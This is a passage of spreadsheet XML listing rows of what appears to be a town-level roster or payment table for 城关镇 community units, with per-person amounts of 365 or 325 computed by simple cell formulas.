      <c r="H912" s="18">
        <v>365</v>
      </c>
      <c r="I912" s="17">
        <f>H912*G912</f>
        <v>365</v>
      </c>
      <c r="J912" s="29">
        <v>45108</v>
      </c>
      <c r="K912" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="913" customHeight="1" spans="1:11">
      <c r="A913" s="16" t="s">
        <v>2442</v>
      </c>
      <c r="B913" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C913" s="17" t="s">
        <v>2443</v>
      </c>
      <c r="D913" s="17" t="s">
        <v>2444</v>
      </c>
      <c r="E913" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F913" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G913" s="17">
        <v>2</v>
      </c>
      <c r="H913" s="18">
        <v>325</v>
      </c>
      <c r="I913" s="17">
        <f>H913*G913</f>
        <v>650</v>
      </c>
      <c r="J913" s="29">
        <v>45108</v>
      </c>
      <c r="K913" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="914" customHeight="1" spans="1:11">
      <c r="A914" s="16" t="s">
        <v>2445</v>
      </c>
      <c r="B914" s="17" t="str">
        <f>B913</f>
        <v>城关镇</v>
      </c>
      <c r="C914" s="17" t="str">
        <f>C913</f>
        <v>中华社区交通局</v>
      </c>
      <c r="D914" s="16" t="s">
        <v>2446</v>
      </c>
      <c r="E914" s="17" t="s">
        <v>1871</v>
      </c>
      <c r="F914" s="17" t="str">
        <f>F913</f>
        <v>4113210108</v>
      </c>
      <c r="G914" s="17"/>
      <c r="H914" s="17"/>
      <c r="I914" s="17"/>
      <c r="J914" s="29"/>
      <c r="K914" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="915" customHeight="1" spans="1:11">
      <c r="A915" s="16" t="s">
        <v>2447</v>
      </c>
      <c r="B915" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C915" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D915" s="17" t="s">
        <v>2448</v>
      </c>
      <c r="E915" s="17" t="s">
        <v>1036</v>
      </c>
      <c r="F915" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G915" s="17">
        <v>1</v>
      </c>
      <c r="H915" s="18">
        <v>365</v>
      </c>
      <c r="I915" s="17">
        <f>H915*G915</f>
        <v>365</v>
      </c>
      <c r="J915" s="29">
        <v>45108</v>
      </c>
      <c r="K915" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="916" customHeight="1" spans="1:11">
      <c r="A916" s="16" t="s">
        <v>2449</v>
      </c>
      <c r="B916" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C916" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D916" s="17" t="s">
        <v>2450</v>
      </c>
      <c r="E916" s="17" t="s">
        <v>2451</v>
      </c>
      <c r="F916" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G916" s="17">
        <v>1</v>
      </c>
      <c r="H916" s="18">
        <v>365</v>
      </c>
      <c r="I916" s="17">
        <f>H916*G916</f>
        <v>365</v>
      </c>
      <c r="J916" s="29">
        <v>45108</v>
      </c>
      <c r="K916" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="917" customHeight="1" spans="1:11">
      <c r="A917" s="16" t="s">
        <v>2452</v>
      </c>
      <c r="B917" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C917" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D917" s="17" t="s">
        <v>2453</v>
      </c>
      <c r="E917" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F917" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G917" s="17">
        <v>2</v>
      </c>
      <c r="H917" s="18">
        <v>325</v>
      </c>
      <c r="I917" s="17">
        <f>H917*G917</f>
        <v>650</v>
      </c>
      <c r="J917" s="29">
        <v>45108</v>
      </c>
      <c r="K917" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="918" customHeight="1" spans="1:11">
      <c r="A918" s="16" t="s">
        <v>2454</v>
      </c>
      <c r="B918" s="17" t="str">
        <f>B917</f>
        <v>城关镇</v>
      </c>
      <c r="C918" s="17" t="str">
        <f>C917</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D918" s="16" t="s">
        <v>2455</v>
      </c>
      <c r="E918" s="16" t="s">
        <v>292</v>
      </c>
      <c r="F918" s="17" t="str">
        <f>F917</f>
        <v>4113210108</v>
      </c>
      <c r="G918" s="17"/>
      <c r="H918" s="17"/>
      <c r="I918" s="17"/>
      <c r="J918" s="29"/>
      <c r="K918" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="919" customHeight="1" spans="1:11">
      <c r="A919" s="16" t="s">
        <v>2456</v>
      </c>
      <c r="B919" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C919" s="17" t="s">
        <v>2339</v>
      </c>
      <c r="D919" s="17" t="s">
        <v>2457</v>
      </c>
      <c r="E919" s="17" t="s">
        <v>761</v>
      </c>
      <c r="F919" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G919" s="17">
        <v>1</v>
      </c>
      <c r="H919" s="18">
        <v>365</v>
      </c>
      <c r="I919" s="17">
        <f t="shared" ref="I919:I924" si="45">H919*G919</f>
        <v>365</v>
      </c>
      <c r="J919" s="29">
        <v>45108</v>
      </c>
      <c r="K919" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="920" customHeight="1" spans="1:11">
      <c r="A920" s="16" t="s">
        <v>2458</v>
      </c>
      <c r="B920" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C920" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D920" s="17" t="s">
        <v>2459</v>
      </c>
      <c r="E920" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F920" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G920" s="17">
        <v>1</v>
      </c>
      <c r="H920" s="18">
        <v>365</v>
      </c>
      <c r="I920" s="17">
        <f t="shared" si="45"/>
        <v>365</v>
      </c>
      <c r="J920" s="29">
        <v>45108</v>
      </c>
      <c r="K920" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="921" customHeight="1" spans="1:11">
      <c r="A921" s="16" t="s">
        <v>2460</v>
      </c>
      <c r="B921" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C921" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D921" s="17" t="s">
        <v>2461</v>
      </c>
      <c r="E921" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F921" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G921" s="17">
        <v>1</v>
      </c>
      <c r="H921" s="18">
        <v>365</v>
      </c>
      <c r="I921" s="17">
        <f t="shared" si="45"/>
        <v>365</v>
      </c>
      <c r="J921" s="29">
        <v>45108</v>
      </c>
      <c r="K921" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="922" customHeight="1" spans="1:11">
      <c r="A922" s="16" t="s">
        <v>2462</v>
      </c>
      <c r="B922" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C922" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D922" s="17" t="s">
        <v>2463</v>
      </c>
      <c r="E922" s="17" t="s">
        <v>958</v>
      </c>
      <c r="F922" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G922" s="17">
        <v>1</v>
      </c>
      <c r="H922" s="18">
        <v>365</v>
      </c>
      <c r="I922" s="17">
        <f t="shared" si="45"/>
        <v>365</v>
      </c>
      <c r="J922" s="29">
        <v>45108</v>
      </c>
      <c r="K922" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="923" customHeight="1" spans="1:11">
      <c r="A923" s="16" t="s">
        <v>2464</v>
      </c>
      <c r="B923" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C923" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D923" s="17" t="s">
        <v>2465</v>
      </c>
      <c r="E923" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F923" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G923" s="17">
        <v>1</v>
      </c>
      <c r="H923" s="18">
        <v>365</v>
      </c>
      <c r="I923" s="17">
        <f t="shared" si="45"/>
        <v>365</v>
      </c>
      <c r="J923" s="29">
        <v>45108</v>
      </c>
      <c r="K923" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="924" customHeight="1" spans="1:11">
      <c r="A924" s="16" t="s">
        <v>2466</v>
      </c>
      <c r="B924" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C924" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D924" s="17" t="s">
        <v>2467</v>
      </c>
      <c r="E924" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F924" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G924" s="17">
        <v>2</v>
      </c>
      <c r="H924" s="18">
        <v>325</v>
      </c>
      <c r="I924" s="17">
        <f t="shared" si="45"/>
        <v>650</v>
      </c>
      <c r="J924" s="29">
        <v>45108</v>
      </c>
      <c r="K924" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="925" customHeight="1" spans="1:11">
      <c r="A925" s="16" t="s">
        <v>2468</v>
      </c>
      <c r="B925" s="17" t="str">
        <f>B924</f>
        <v>城关镇</v>
      </c>
      <c r="C925" s="17" t="str">
        <f>C924</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D925" s="16" t="s">
        <v>2469</v>
      </c>
      <c r="E925" s="16" t="s">
        <v>2470</v>
      </c>
      <c r="F925" s="17" t="str">
        <f>F924</f>
        <v>4113210108</v>
      </c>
      <c r="G925" s="17"/>
      <c r="H925" s="17"/>
      <c r="I925" s="17"/>
      <c r="J925" s="29"/>
      <c r="K925" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="926" customHeight="1" spans="1:11">
      <c r="A926" s="16" t="s">
        <v>2471</v>
      </c>
      <c r="B926" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C926" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D926" s="17" t="s">
        <v>2472</v>
      </c>
      <c r="E926" s="17" t="s">
        <v>2473</v>
      </c>
      <c r="F926" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G926" s="17">
        <v>1</v>
      </c>
      <c r="H926" s="18">
        <v>365</v>
      </c>
      <c r="I926" s="17">
        <f t="shared" ref="I926:I936" si="46">H926*G926</f>
        <v>365</v>
      </c>
      <c r="J926" s="29">
        <v>45108</v>
      </c>
      <c r="K926" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="927" customHeight="1" spans="1:11">
      <c r="A927" s="16" t="s">
        <v>2474</v>
      </c>
      <c r="B927" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C927" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D927" s="17" t="s">
        <v>2475</v>
      </c>
      <c r="E927" s="17" t="s">
        <v>1630</v>
      </c>
      <c r="F927" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G927" s="17">
        <v>1</v>
      </c>
      <c r="H927" s="18">
        <v>365</v>
      </c>
      <c r="I927" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J927" s="29">
        <v>45108</v>
      </c>
      <c r="K927" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="928" customHeight="1" spans="1:11">
      <c r="A928" s="16" t="s">
        <v>2476</v>
      </c>
      <c r="B928" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C928" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D928" s="17" t="s">
        <v>2477</v>
      </c>
      <c r="E928" s="17" t="s">
        <v>2478</v>
      </c>
      <c r="F928" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G928" s="17">
        <v>1</v>
      </c>
      <c r="H928" s="18">
        <v>365</v>
      </c>
      <c r="I928" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J928" s="29">
        <v>45108</v>
      </c>
      <c r="K928" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="929" customHeight="1" spans="1:11">
      <c r="A929" s="16" t="s">
        <v>2479</v>
      </c>
      <c r="B929" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C929" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D929" s="17" t="s">
        <v>2480</v>
      </c>
      <c r="E929" s="17" t="s">
        <v>2481</v>
      </c>
      <c r="F929" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G929" s="17">
        <v>1</v>
      </c>
      <c r="H929" s="18">
        <v>365</v>
      </c>
      <c r="I929" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J929" s="29">
        <v>45108</v>
      </c>
      <c r="K929" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="930" customHeight="1" spans="1:11">
      <c r="A930" s="16" t="s">
        <v>2482</v>
      </c>
      <c r="B930" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C930" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D930" s="17" t="s">
        <v>2483</v>
      </c>
      <c r="E930" s="17" t="s">
        <v>675</v>
      </c>
      <c r="F930" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G930" s="17">
        <v>1</v>
      </c>
      <c r="H930" s="18">
        <v>365</v>
      </c>
      <c r="I930" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J930" s="29">
        <v>45108</v>
      </c>
      <c r="K930" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="931" customHeight="1" spans="1:11">
      <c r="A931" s="16" t="s">
        <v>2484</v>
      </c>
      <c r="B931" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C931" s="17" t="s">
        <v>2402</v>
      </c>
      <c r="D931" s="17" t="s">
        <v>2485</v>
      </c>
      <c r="E931" s="17" t="s">
        <v>2486</v>
      </c>
      <c r="F931" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G931" s="17">
        <v>1</v>
      </c>
      <c r="H931" s="18">
        <v>365</v>
      </c>
      <c r="I931" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J931" s="29">
        <v>45108</v>
      </c>
      <c r="K931" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="932" customHeight="1" spans="1:11">
      <c r="A932" s="16" t="s">
        <v>2487</v>
      </c>
      <c r="B932" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C932" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D932" s="17" t="s">
        <v>2488</v>
      </c>
      <c r="E932" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F932" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G932" s="17">
        <v>1</v>
      </c>
      <c r="H932" s="18">
        <v>365</v>
      </c>
      <c r="I932" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J932" s="29">
        <v>45108</v>
      </c>
      <c r="K932" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="933" customHeight="1" spans="1:11">
      <c r="A933" s="16" t="s">
        <v>2489</v>
      </c>
      <c r="B933" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C933" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D933" s="17" t="s">
        <v>2490</v>
      </c>
      <c r="E933" s="17" t="s">
        <v>2255</v>
      </c>
      <c r="F933" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G933" s="17">
        <v>1</v>
      </c>
      <c r="H933" s="18">
        <v>365</v>
      </c>
      <c r="I933" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J933" s="29">
        <v>45108</v>
      </c>
      <c r="K933" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="934" customHeight="1" spans="1:11">
      <c r="A934" s="16" t="s">
        <v>2491</v>
      </c>
      <c r="B934" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C934" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D934" s="17" t="s">
        <v>2492</v>
      </c>
      <c r="E934" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F934" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G934" s="17">
        <v>1</v>
      </c>
      <c r="H934" s="18">
        <v>365</v>
      </c>
      <c r="I934" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J934" s="29">
        <v>45108</v>
      </c>
      <c r="K934" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="935" customHeight="1" spans="1:11">
      <c r="A935" s="16" t="s">
        <v>2493</v>
      </c>
      <c r="B935" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C935" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D935" s="17" t="s">
        <v>2494</v>
      </c>
      <c r="E935" s="17" t="s">
        <v>2495</v>
      </c>
      <c r="F935" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G935" s="17">
        <v>1</v>
      </c>
      <c r="H935" s="18">
        <v>365</v>
      </c>
      <c r="I935" s="17">
        <f t="shared" si="46"/>
        <v>365</v>
      </c>
      <c r="J935" s="29">
        <v>45108</v>
      </c>
      <c r="K935" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="936" customHeight="1" spans="1:11">
      <c r="A936" s="16" t="s">
        <v>2496</v>
      </c>
      <c r="B936" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C936" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D936" s="17" t="s">
        <v>2497</v>
      </c>
      <c r="E936" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F936" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G936" s="17">
        <v>2</v>
      </c>
      <c r="H936" s="18">
        <v>325</v>
      </c>
      <c r="I936" s="17">
        <f t="shared" si="46"/>
        <v>650</v>
      </c>
      <c r="J936" s="29">
        <v>45108</v>
      </c>
      <c r="K936" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="937" customHeight="1" spans="1:11">
      <c r="A937" s="16" t="s">
        <v>2498</v>
      </c>
      <c r="B937" s="17" t="str">
        <f>B936</f>
        <v>城关镇</v>
      </c>
      <c r="C937" s="17" t="str">
        <f>C936</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D937" s="17" t="s">
        <v>2499</v>
      </c>
      <c r="E937" s="16" t="s">
        <v>2500</v>
      </c>
      <c r="F937" s="17" t="str">
        <f>F936</f>
        <v>4113210108</v>
      </c>
      <c r="G937" s="17"/>
      <c r="H937" s="17"/>
      <c r="I937" s="17"/>
      <c r="J937" s="29"/>
      <c r="K937" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="938" customHeight="1" spans="1:11">
      <c r="A938" s="16" t="s">
        <v>2501</v>
      </c>
      <c r="B938" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C938" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D938" s="17" t="s">
        <v>2502</v>
      </c>
      <c r="E938" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F938" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G938" s="17">
        <v>1</v>
      </c>
      <c r="H938" s="18">
        <v>365</v>
      </c>
      <c r="I938" s="17">
        <f t="shared" ref="I938:I945" si="47">H938*G938</f>
        <v>365</v>
      </c>
      <c r="J938" s="29">
        <v>45108</v>
      </c>
      <c r="K938" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="939" customHeight="1" spans="1:11">
      <c r="A939" s="16" t="s">
        <v>2503</v>
      </c>
      <c r="B939" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C939" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D939" s="17" t="s">
        <v>2504</v>
      </c>
      <c r="E939" s="17" t="s">
        <v>2505</v>
      </c>
      <c r="F939" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G939" s="17">
        <v>1</v>
      </c>
      <c r="H939" s="18">
        <v>365</v>
      </c>
      <c r="I939" s="17">
        <f t="shared" si="47"/>
        <v>365</v>
      </c>
      <c r="J939" s="29">
        <v>45108</v>
      </c>
      <c r="K939" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="940" customHeight="1" spans="1:11">
      <c r="A940" s="16" t="s">
        <v>2506</v>
      </c>
      <c r="B940" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C940" s="17" t="s">
        <v>2339</v>
      </c>
      <c r="D940" s="17" t="s">
        <v>2507</v>
      </c>
      <c r="E940" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F940" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G940" s="17">
        <v>1</v>
      </c>
      <c r="H940" s="18">
        <v>365</v>
      </c>
      <c r="I940" s="17">
        <f t="shared" si="47"/>
        <v>365</v>
      </c>
      <c r="J940" s="29">
        <v>45108</v>
      </c>
      <c r="K940" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="941" customHeight="1" spans="1:11">
      <c r="A941" s="16" t="s">
        <v>2508</v>
      </c>
      <c r="B941" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C941" s="17" t="s">
        <v>2509</v>
      </c>
      <c r="D941" s="17" t="s">
        <v>2510</v>
      </c>
      <c r="E941" s="17" t="s">
        <v>2511</v>
      </c>
      <c r="F941" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G941" s="17">
        <v>1</v>
      </c>
      <c r="H941" s="18">
        <v>365</v>
      </c>
      <c r="I941" s="17">
        <f t="shared" si="47"/>
        <v>365</v>
      </c>
      <c r="J941" s="29">
        <v>45108</v>
      </c>
      <c r="K941" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="942" customHeight="1" spans="1:11">
      <c r="A942" s="16" t="s">
        <v>2512</v>
      </c>
      <c r="B942" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C942" s="17" t="s">
        <v>2513</v>
      </c>
      <c r="D942" s="17" t="s">
        <v>2514</v>
      </c>
      <c r="E942" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F942" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G942" s="17">
        <v>1</v>
      </c>
      <c r="H942" s="18">
        <v>365</v>
      </c>
      <c r="I942" s="17">
        <f t="shared" si="47"/>
        <v>365</v>
      </c>
      <c r="J942" s="29">
        <v>45108</v>
      </c>
      <c r="K942" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="943" customHeight="1" spans="1:11">
      <c r="A943" s="16" t="s">
        <v>2515</v>
      </c>
      <c r="B943" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C943" s="17" t="s">
        <v>2339</v>
      </c>
      <c r="D943" s="17" t="s">
        <v>2516</v>
      </c>
      <c r="E943" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F943" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G943" s="17">
        <v>1</v>
      </c>
      <c r="H943" s="18">
        <v>365</v>
      </c>
      <c r="I943" s="17">
        <f t="shared" si="47"/>
        <v>365</v>
      </c>
      <c r="J943" s="29">
        <v>45108</v>
      </c>
      <c r="K943" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="944" customHeight="1" spans="1:11">
      <c r="A944" s="16" t="s">
        <v>2517</v>
      </c>
      <c r="B944" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C944" s="17" t="s">
        <v>2518</v>
      </c>
      <c r="D944" s="17" t="s">
        <v>2519</v>
      </c>
      <c r="E944" s="17" t="s">
        <v>992</v>
      </c>
      <c r="F944" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G944" s="17">
        <v>1</v>
      </c>
      <c r="H944" s="18">
        <v>365</v>
      </c>
      <c r="I944" s="17">
        <f t="shared" si="47"/>
        <v>365</v>
      </c>
      <c r="J944" s="29">
        <v>45108</v>
      </c>
      <c r="K944" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="945" customHeight="1" spans="1:11">
      <c r="A945" s="16" t="s">
        <v>2520</v>
      </c>
      <c r="B945" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C945" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D945" s="17" t="s">
        <v>2521</v>
      </c>
      <c r="E945" s="17" t="s">
        <v>2522</v>
      </c>
      <c r="F945" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G945" s="17">
        <v>2</v>
      </c>
      <c r="H945" s="18">
        <v>325</v>
      </c>
      <c r="I945" s="17">
        <f t="shared" si="47"/>
        <v>650</v>
      </c>
      <c r="J945" s="29">
        <v>45108</v>
      </c>
      <c r="K945" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="946" customHeight="1" spans="1:11">
      <c r="A946" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="B946" s="17" t="str">
        <f>B945</f>
        <v>城关镇</v>
      </c>
      <c r="C946" s="17" t="str">
        <f>C945</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D946" s="16" t="s">
        <v>2524</v>
      </c>
      <c r="E946" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F946" s="17" t="str">
        <f>F945</f>
        <v>4113210108</v>
      </c>
      <c r="G946" s="17"/>
      <c r="H946" s="17"/>
      <c r="I946" s="17"/>
      <c r="J946" s="29"/>
      <c r="K946" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="947" customHeight="1" spans="1:11">
      <c r="A947" s="16" t="s">
        <v>2526</v>
      </c>
      <c r="B947" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C947" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D947" s="17" t="s">
        <v>2527</v>
      </c>
      <c r="E947" s="17" t="s">
        <v>2528</v>
      </c>
      <c r="F947" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G947" s="17">
        <v>2</v>
      </c>
      <c r="H947" s="18">
        <v>325</v>
      </c>
      <c r="I947" s="17">
        <f>H947*G947</f>
        <v>650</v>
      </c>
      <c r="J947" s="29">
        <v>45108</v>
      </c>
      <c r="K947" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="948" customHeight="1" spans="1:11">
      <c r="A948" s="16" t="s">
        <v>2529</v>
      </c>
      <c r="B948" s="17" t="str">
        <f>B947</f>
        <v>城关镇</v>
      </c>
      <c r="C948" s="17" t="str">
        <f>C947</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D948" s="16" t="s">
        <v>2530</v>
      </c>
      <c r="E948" s="16" t="s">
        <v>2531</v>
      </c>
      <c r="F948" s="17" t="str">
        <f>F947</f>
        <v>4113210108</v>
      </c>
      <c r="G948" s="17"/>
      <c r="H948" s="17"/>
      <c r="I948" s="17"/>
      <c r="J948" s="29"/>
      <c r="K948" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="949" customHeight="1" spans="1:11">
      <c r="A949" s="16" t="s">
        <v>2532</v>
      </c>
      <c r="B949" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C949" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D949" s="17" t="s">
        <v>2533</v>
      </c>
      <c r="E949" s="17" t="s">
        <v>578</v>
      </c>
      <c r="F949" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G949" s="17">
        <v>2</v>
      </c>
      <c r="H949" s="18">
        <v>325</v>
      </c>
      <c r="I949" s="17">
        <f>H949*G949</f>
        <v>650</v>
      </c>
      <c r="J949" s="29">
        <v>45108</v>
      </c>
      <c r="K949" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="950" customHeight="1" spans="1:11">
      <c r="A950" s="16" t="s">
        <v>2534</v>
      </c>
      <c r="B950" s="17" t="str">
        <f>B949</f>
        <v>城关镇</v>
      </c>
      <c r="C950" s="17" t="str">
        <f>C949</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D950" s="23" t="s">
        <v>2535</v>
      </c>
      <c r="E950" s="23" t="s">
        <v>2536</v>
      </c>
      <c r="F950" s="17" t="str">
        <f>F949</f>
        <v>4113210108</v>
      </c>
      <c r="G950" s="17"/>
      <c r="H950" s="17"/>
      <c r="I950" s="17"/>
      <c r="J950" s="29"/>
      <c r="K950" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="951" customHeight="1" spans="1:11">
      <c r="A951" s="16" t="s">
        <v>2537</v>
      </c>
      <c r="B951" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C951" s="17" t="s">
        <v>2538</v>
      </c>
      <c r="D951" s="17" t="s">
        <v>2539</v>
      </c>
      <c r="E951" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F951" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G951" s="17">
        <v>1</v>
      </c>
      <c r="H951" s="18">
        <v>365</v>
      </c>
      <c r="I951" s="17">
        <f>H951*G951</f>
        <v>365</v>
      </c>
      <c r="J951" s="29">
        <v>45108</v>
      </c>
      <c r="K951" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="952" customHeight="1" spans="1:11">
      <c r="A952" s="16" t="s">
        <v>2540</v>
      </c>
      <c r="B952" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C952" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D952" s="17" t="s">
        <v>2541</v>
      </c>
      <c r="E952" s="17" t="s">
        <v>874</v>
      </c>
      <c r="F952" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G952" s="17">
        <v>1</v>
      </c>
      <c r="H952" s="18">
        <v>365</v>
      </c>
      <c r="I952" s="17">
        <f>H952*G952</f>
        <v>365</v>
      </c>
      <c r="J952" s="29">
        <v>45108</v>
      </c>
      <c r="K952" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="953" customHeight="1" spans="1:11">
      <c r="A953" s="16" t="s">
        <v>2542</v>
      </c>
      <c r="B953" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C953" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D953" s="17" t="s">
